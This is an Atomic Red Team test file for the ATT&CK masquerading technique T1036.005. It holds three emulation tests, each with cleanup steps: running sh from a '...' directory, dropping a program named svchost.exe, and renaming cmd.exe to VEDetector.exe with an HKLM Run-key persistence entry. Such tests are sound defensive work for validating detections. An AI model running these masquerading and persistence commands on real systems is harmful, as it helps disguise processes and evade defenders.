atomic-red-team/atomics/T1036.005/T1036.005.md

# T1036.005 - Masquerading: Match Legitimate Name or Location
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
<blockquote>

Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. 

This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)

- [Atomic Test #2 - Masquerade as a built-in system executable](#atomic-test-2---masquerade-as-a-built-in-system-executable)

- [Atomic Test #3 - Masquerading cmd.exe as VEDetector.exe](#atomic-test-3---masquerading-cmdexe-as-vedetectorexe)


<br/>

## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)

**Supported Platforms:** macOS, Linux


**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_message | Test message to echo out to the screen | string | Hello from the Atomic Red Team test T1036.005#1|


#### Attack Commands: Run with `sh`! 


```sh
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"
```

#### Cleanup Commands:
```sh
rm -f $HOME/.../sh
rmdir $HOME/.../
```





<br/>
<br/>

## Atomic Test #2 - Masquerade as a built-in system executable
Launch an executable that attempts to masquerade as a legitimate executable.

**Supported Platforms:** Windows


**auto_generated_guid:** 35eb8d16-9820-4423-a2a1-90c4f5edd9ca





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | string | $Env:windir&#92;Temp&#92;svchost.exe|


#### Attack Commands: Run with `powershell`! 


```powershell
Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"
```

#### Cleanup Commands:
```powershell
Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
```





<br/>
<br/>

## Atomic Test #3 - Masquerading cmd.exe as VEDetector.exe
This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
This technique may be used to evade detection by mimicking legitimate software names or locations.

**Expected Output:**
- A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
- SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications).
- Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.

**References:**
- [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
- [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)

**Supported Platforms:** Windows


**auto_generated_guid:** 03ae82a6-9fa0-465b-91df-124d8ca5c4e8





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ved_path | Directory path where VEDetector.exe will be created | Path | $env:TEMP|
| source_file | Path to the source cmd.exe file | Path | $env:SystemRoot&#92;System32&#92;cmd.exe|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"

Start-Sleep -Seconds 5
```

#### Cleanup Commands:
```powershell
# Remove registry key
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -ErrorAction SilentlyContinue

# Stop the process
Stop-Process -Name "VEDetector" -Force -ErrorAction SilentlyContinue

# Remove the file
Remove-Item -Path "#{ved_path}\VEDetector.exe" -Force -ErrorAction SilentlyContinue

Write-Host "[+] Cleaned up VEDetector artifacts"
```



#### Dependencies:  Run with `powershell`!
##### Description: The source cmd.exe file must exist on the system.
##### Check Prereq Commands:
```powershell
if (Test-Path "#{source_file}") { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "[-] Source file not found: #{source_file}. Ensure cmd.exe exists in the specified path."
exit 1
```




<br/>